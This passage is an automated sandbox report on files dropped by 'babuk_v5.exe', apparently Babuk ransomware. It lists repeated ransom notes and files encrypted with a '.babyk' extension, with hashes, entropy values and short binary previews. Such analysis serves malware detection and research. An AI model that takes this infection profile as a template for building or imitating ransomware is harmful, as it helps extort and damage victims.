                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.977975926691697
                                                                            Encrypted:false
                                                                            SSDEEP:192:5ncJ6T+63JWPSMLWfMze3/FhRcW5LqV6fM6+gVjRW/FNMGo:5ncIWPFG4W5G4fd+gFR2MB
                                                                            MD5:89C343343F97709D00BE40B4E8C11631
                                                                            SHA1:849C4CA20C41BA4256A647665424ED9B1363C264
                                                                            SHA-256:81B20BE21C3AF23ABE0FF40606AAA6FD80A196EEAFC14A8C4C4350E7CAC52D04
                                                                            SHA-512:604B1312CDA11031703DEE6A92DEBAF1E8BE470CD9498CA17B83BEC6020016B850A431FD80DB6AB50C6F017CF5E032B83D577555816059694CD80B9803D969A9
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Collab\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Forms\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):190
                                                                            Entropy (8bit):6.658274768983386
                                                                            Encrypted:false
                                                                            SSDEEP:3:Vo9Lsg8ZPvub3bsh8DCxXqvMjJvQKZqFuJAHFb+g8KsA72kRn62kN3FTs9LLUxN1:eNyA3AdxLvfZqFuJi1Ww7sB7TyLL0vtn
                                                                            MD5:8E45C9A1B429B0AF2D8621A482B109A8
                                                                            SHA1:8EC8583A07BF8C896905E4A2C7935764C34908DC
                                                                            SHA-256:85C85080C2FC6742439211935099761397251754B133587E11358782C6DEEE59
                                                                            SHA-512:C36B478EAEBCF366C991F4952C7CB0B6290637650DE00023E911BB496E3E0109E2873E58FB4A72A4DBD64D3E8B65F0C8C52A83DC5597F8322AF8DB264D1BF14E
                                                                            Malicious:false
                                                                            Preview: ..km...n./..Il66|j..{.....>9Q...4o,....E.s.[....g...7...:R.Q.... .WJuo...`.!.l.Ynr.!....."6v......+9D.....v.poI....7.f....KD.MR..)y...,.8..U..q.C..6.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):192
                                                                            Entropy (8bit):6.747410417645778
                                                                            Encrypted:false
                                                                            SSDEEP:3:A9nEmto/YnMz1G/apy3Q1DZ4eyt1HJsRnlU+iymWxWJ8mRXSKSUxNvEEn:mto/KZ/R3walt1HR+dmWxWJ8mRXSf0vt
                                                                            MD5:0A756747234E917BDB71BB02FA166336
                                                                            SHA1:F009F61651E718E1B9D9B98645CDE523C3452B74
                                                                            SHA-256:802A8C8C4EF47304C2C27C794397AE98CEA268A188899B9EE98830BF3500912B
                                                                            SHA-512:E18A668D7079673447A9B4747D8BECC9BA57963DC985EA107686FDE1714A28FFB1018723CC8283D0FFED6A8409E3CA2E8716DC3DAC835A7D3CC646BEC458F5B9
                                                                            Malicious:false
                                                                            Preview: ...y.u#.....a.L.*.yBX".o....'.....oP.d.5..2q)....>..?.....m.Q.....M"..g^)...:..._..{.MfM...G.."..m.V!...6...,...J...........q...j...l.J$.4......Qj.H.+.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):805
                                                                            Entropy (8bit):7.7376756803634335
                                                                            Encrypted:false
                                                                            SSDEEP:12:L6nKmjQapeQD5wE1LGOl64CQ6aI5v++y2ZjzDwgstpBjJksglIAHGUA710pDooa/:L6KKQaphVlGxQO5fl9JstnjGP8371AKb
                                                                            MD5:2C730B60806455F3A1F0DF6058D79FF8
                                                                            SHA1:03FBA23206D8321B8939167D4132DF2CD20D1B59
                                                                            SHA-256:F803905FAD25793B649198FAC63867C1E50695590873242EE961D002F7126AE3
                                                                            SHA-512:A5F8BF4846F60BD0E61B92517B648F9C77F859032C64470F49CBB1EDB75FAB90281F75948AD1C475005455E3B38D95B95088883C2420EFFD9702AC891E7100E6
                                                                            Malicious:false
                                                                            Preview: [binary data] ...choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):593
                                                                            Entropy (8bit):7.61889722431374
                                                                            Encrypted:false
                                                                            SSDEEP:12:3CDMDg7E1WxIOPxg+KFQ0aXOv9c49mGFfmIMi07s+ws:QX7sfOPxbKFQk7fm3l7Qs
                                                                            MD5:091DB780D183342AD2FB28A65CC11DD7
                                                                            SHA1:76F39F1717E0DE0084E747258C0E38C875DC2A7A
                                                                            SHA-256:841DA874F9D76505923512ED80F607C629D813D283B9CC06D75800FF5AA3DDB7
                                                                            SHA-512:1AC3FF77A3EAE23C1A5E46B75CC5C1C139C8B3099B8BE22ED1C52C9AB3F9B3042CF32894851F5A8D7C5253857E303A64FA12F2D87829AFBCABF381B0CAD33AA0
                                                                            Malicious:false
                                                                            Preview: [binary data] ...choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):10408
                                                                            Entropy (8bit):7.982224965502696
                                                                            Encrypted:false
                                                                            SSDEEP:192:+Y85jUAtrm/uddAdfpQbaKlllO2f3mXWEoVTOAqANMJbBLC5caOybd8rOmke8:l8nUudc6OmJOwCBLkcaOyKBke8
                                                                            MD5:5314935E9AE7CA4B499527684D4AA7DB
                                                                            SHA1:42E78E620299B4D07AC1FB62696C17F85BA9F0B7
                                                                            SHA-256:033A296AF1727B32A699B6EA8E08EB2EA9AD3D9A4A8AC1BB8680915BF811ADF1
                                                                            SHA-512:A94A3F96249C6BF92BF7BA0AB3211C2CA5B0D4A0F4667C7B052E3390B282ADED27B72D2D75EA6A84F3E2AC7EF033F1C89D93EAD46979EF8F0CBE6831DE786231
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):24320
                                                                            Entropy (8bit):7.992292710132398
                                                                            Encrypted:true
                                                                            SSDEEP:384:PZB/EHPH9Ow7wCmQd1nxSOEmbKZxlALCJ2Ih5DxU4U/tLeXsYRi3YSELMHNJGyYk:ns9OYwenxTEmGZxKCJ5le9osFZEINJGU
                                                                            MD5:9D3A07707D83E9A53383DF29F157AA61
                                                                            SHA1:91EEA9BBEFDFB4FFFA69DEC9335DD2661ACF448E
                                                                            SHA-256:49AAA45CDF4FB84F7F79342B84DB95B98B0998C1034390FA0FF4C4E6F76E80A1
                                                                            SHA-512:8C45F69CEB81DFFFB155494533901BFF98884EA6DA31BE1FB07BAB065DDA958637BB1415D9906B9420EADB863C9120BF210D7F3E218F9353C02BD582EAD50B6C
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storek.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):432
                                                                            Entropy (8bit):7.412419468007256
                                                                            Encrypted:false
                                                                            SSDEEP:12:FFWNO4QAT3e6+0x6/albIetDnb22KrRiGxis:TWw1AT3e6+0x9ttLS2KkGX
                                                                            MD5:CF662337DC8A21D2C3D2D8106ACF6432
                                                                            SHA1:F7B6B87995022516D24131D3E361767E0F6BC8EC
                                                                            SHA-256:6B827E4AAEA97A5C54E8F573CD7E4BFB8D70E51EFC86B72AB0E1EE3B6894A416
                                                                            SHA-512:5286AC9A172E33A4C15A028064B8C7ED7CC4F6BA03D6D525D79F5972951CBF01E10D4EEECC0CEFE9FA609302A6DDD241244E66CA6DE936CC22AF0724FDFAC8DC
                                                                            Malicious:false
                                                                            Preview: [binary data] ...choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):14624
                                                                            Entropy (8bit):7.987756009093507
                                                                            Encrypted:false
                                                                            SSDEEP:384:+/PE3jEnK5yMz3iCwIwwdWIdgvTMWklSn8EnWFDGNdkd:+E/1WCK2W9T7PWlG7E
                                                                            MD5:5872C1001D651DBC965355BC535936B3
                                                                            SHA1:906BBCFEA2B642DC28BA9E977EF6A09B68A499CD
                                                                            SHA-256:40586DB96F92169AB711A3887466A0FAC1B93D8AA73AC1405ED9E7323AA1FA4B
                                                                            SHA-512:F386C15BE9059D4A6DC80E0E90A2A0AE13C30BF74787A1BBC1AFC7F5A3677AADBFA09582665D386DB22A52BD8F2F18571FB32BC6ACA003E5DBD97BF8F0CA9BA3
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Adobe\Acrobat\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Adobe\Flash Player\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Adobe\Headlights\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Adobe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Adobe\Linguistics\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Adobe\LogTransport2\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\AddIns\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Credentials\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Excel\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Roaming\Microsoft\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
